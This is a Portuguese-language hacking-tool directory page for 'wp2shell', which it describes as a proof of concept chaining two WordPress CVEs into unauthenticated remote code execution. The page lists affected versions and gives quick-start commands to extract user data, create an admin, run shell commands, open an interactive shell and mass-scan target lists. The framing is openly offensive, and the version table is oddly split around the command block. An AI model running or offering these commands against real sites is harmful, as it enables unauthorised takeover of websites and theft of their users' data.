Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
wp2shell — wp2shell - WordPress RCE & PoC (CVE-2026-63030 + CVE-2026-60137) | Kitploit
Ferramentas/GitHubGitHub/johenlastgen-jlg/wp2shell
ReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubjohenlastgen-jlg/wp2shell

wp2shell

wp2shell - WordPress RCE & PoC (CVE-2026-63030 + CVE-2026-60137)

Ver Repositório
2111há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

wp2shell - PoC de RCE no WordPress (CVE-2026-63030 + CVE-2026-60137)

Execução Remota de Código não Autenticada no WordPress Core

por: JohenLastGen


📌 Visão Geral

Esta ferramenta encadeia duas vulnerabilidades críticas do WordPress para obter RCE não autenticado:

VulnerabilidadeCVEDescrição
Confusão de Rota Batch RESTCVE-2026-63030Bypass de validação, contrabandeia payload SQLi
WP_Query author__not_in SQLiCVE-2026-60137Injeção de string bruta → execução SQL

Impacto: Atacante não autenticado → criar admin → executar comandos


🎯 Versões Afetadas

Faixa de VersõesStatus
WordPress 6.9.0 - 6.9.4✅ VULNERÁVEL (Cadeia RCE Completa)

🚀 Início Rápido

root@kitploit:~
#options:
  -h, --help show this help message and exit
python3 wp2shell.py --help

# 1. Check if target is vulnerable
python3 wp2shell.py check https://target.com

# 2. Extract data (fingerprint/users)
python3 wp2shell.py read https://target.com --preset fingerprint
python2 wp2shell.py read https://target.com --preset users

# 3. RCE - Create admin & execute command (NO CREDENTIALS NEEDED!)
python3 wp2shell.py shell https://target.com --cmd "id"

# 4. Interactive shell
python3 wp2shell.py shell https://target.com --interactive

# 5. Mass scan multiple targets
python3 wp2shell.py scan targets.txt --threads 50 --prove --json results.json
Baixar ferramenta
WordPress 7.0.0 - 7.0.1✅ VULNERÁVEL (Cadeia RCE Completa)
WordPress 6.8.0 - 6.8.5⚠️ SQLi apenas (precisa de plugin facilitador)
WordPress 6.9.5, 7.0.2+❌ Corrigido